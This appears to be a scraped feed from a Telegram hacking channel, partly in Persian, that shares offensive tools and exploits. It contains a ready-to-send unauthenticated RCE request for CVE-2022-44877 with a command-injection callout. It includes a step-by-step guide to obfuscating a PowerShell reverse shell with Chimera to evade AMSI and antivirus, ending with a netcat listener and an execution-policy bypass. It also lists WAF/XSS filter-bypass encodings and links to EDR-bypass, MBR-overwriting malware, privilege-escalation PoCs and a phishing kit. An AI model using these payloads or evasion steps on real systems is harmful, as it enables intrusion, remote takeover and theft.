0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.22K photos
122 videos
487 files
1.25K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Photoshop CC v19 installer for Linux

Github

#Linux #tools
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍8👎1
FilelessNtdllReflection ( Bypass Userland EDR )

Github

#bypass
——————‌
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-44877

Control Web Panel Unauth RCE

usage :
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1
Host: vuln
Content-Type: application/x-www-form-urlencoded

username=root&password=toor&commit=Login

#RCE #CVE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍11🔥2
C/C++ Memory Hacking -- OverWrite MBR

https://youtu.be/2Gfmw_6sYz4

#Malware #MBR #Virus
——————‌
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
[ Tags ]
#Malware #Bypass #AMSI #AntiVirus #Chimera #Script

آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها )

IR0Day.Today Bax
@LearnExploit
@Tech_Army
7
0Day.Today | Learn Exploit | Zero World | Dark web |
[ Tags ] #Malware #Bypass #AMSI #AntiVirus #Chimera #Script آموزش ابزار Obfuscate ) Chimera کردن اسکریپت های پاورشل برای بایپس AMSI و Anti Virus ها ) IR0Day.Today Bax @LearnExploit @Tech_Army
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.

تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )

$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)


نحوه ی نصب در Linux :
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

2. کلون کردن ریپو :
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) :
sudo chown root:root -R /opt/chimera/

4. تغییر مسیر به opt/chimera/ :
cd /opt/chimera/

5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :
sudo chmod +x chimera.sh

6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :
./chimera.sh —help

نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1

2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :
پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1

گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :
powershell.exe -ep bypass C:\<PATH>\Payload.ps1

و تمام.
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47

IR0Day.Today Bax
@LearnExploit
@Tech_Army
6👍3❤‍🔥2
درود بکس
اگر مشکل کندی سرعت داری...
امروز میخوام در مورد LoadBalance باهاتون صحبت کنم .
در حالت عادی 99 درصد بچه هایی که دارن VPN می سازن و میفروشن بعد از مدتی از مشکل کندی شاکی میشن... ، تو چنین شرایطی ایپی شما دیتکت شده و میزان ترافیک ورودی به سرور شما محدود شده! یعنی اومدن IN-BOUND سرورتون رو کاهش دادن و حتی در بعضی مواقع عملا IN-BOUND شما در حد کیلو بایته و شما حتی نمیتونین SSH بزنین و ...
تو چنین شرایطی باید ایپی سرورتون رو تغییر بدید حالا پرووایدر های مختلفی واسه تغییر ایپی سیاست متفاوتی رو دارن بعضیا رایگان و بعضیا پولی .

خب LoadBlancing تو چنین شرایطی چه کمکی به ما میکنه ؟
ببینید بچه ها شما فرض کنید یک سرور با سه ایپی زیر دارید :
1.1.1.1
1.1.1.2
1.1.1.3
در حالت عادی کاربرای شما برای اتصال به پروتکل vpn شما از یک ای پی استفاده میکنه یعنی شما 30 تا یوزر روی سرورتون دارید و برای هر 10 تا یوزر یه ایپی تعریف کردید به صورت زیر
1.1.1.1 >> Top 10 User
1.1.1.2 >> Second 10 User
1.1.1.3 >> Third 10 User
تو چنین شرایطی سرور شما زودتر دیتکت میشه و ترافیک ورودیش کاهش پیدا میکنه حالا LoadBalance میاد چیکار میکنه شما بجای اینکه بیایی یوزراتو جدا کنی و برای هر کودوم ای پی جدا بدی واسه ی همه ی یوزرا امکان استفاده از تمام ای پی ها رو امکان پذیر میکنی اینجاست که مفهوم LoadBalancing پررنگ میشه.
به زبون خیلی ساده 30 تا یوزر روی سرورت میتونه به هر 3 تا ایپی سرورت متصل بشه و از همون پروتکل استفاده کنه.

نحوه ی استفاده از LoadBalancing رایگان رو توی پست بعدی انشاالله بهتون میگم

فعلا اگه سوالی داشتید توی گپ بپرسید تا پست رو آماده کنم.
Author : X P 4

channel : @BypassNetwork
👍12👏1
This media is not supported in your browser
VIEW IN TELEGRAM
GitHub has a built-in VSCode.
Just change .com to .dev on your repo:

#Git #Github
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍8
Exploit to CVE-2022-46169 vulnerability on Cacti 1.2.19

Github

#exploit #CVE
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍9
Exploiting API with AuthToken

Read Here

#api #exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍2
XSS/WAF/SQL filter bypass.

< - %EF%BC%9C (\uff1c)
> - %EF%BC%9E (\uff1e)
\ - %EF%BC%BC (\uff3c)
/ - %EF%BC%8F (\uff0f)
' - %EF%BC%87 (\uff07)
" - %EF%BC%82 (\uff02)

#bypass #xss #waf #sql
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍13🍾2
میگه باو بنازم 🔥📿

@LearnExploit_Group
——————‌
0Day.Today
@LearnExploit
@Tech_Army
8🍾1
windows lpe pocs

Github

#windows #POC
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍1
terminalGPT

Get GPT like chatGPT on your terminal

Github

#chatgpt #terminal
——————‌
0Day.Today
@LearnExploit
@Tech_Army
5👍2
CVE-2023-0297 ( The Story of Finding Pre-auth RCE in pyLoad )

Github

#CVE #RCE #exploit
——————‌
0Day.Today
@LearnExploit
@Tech_Army
👍1
آموزش ابزار Rubikphish روی کالی لینوکس

Github

#phishing #kali #linux #tools

iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army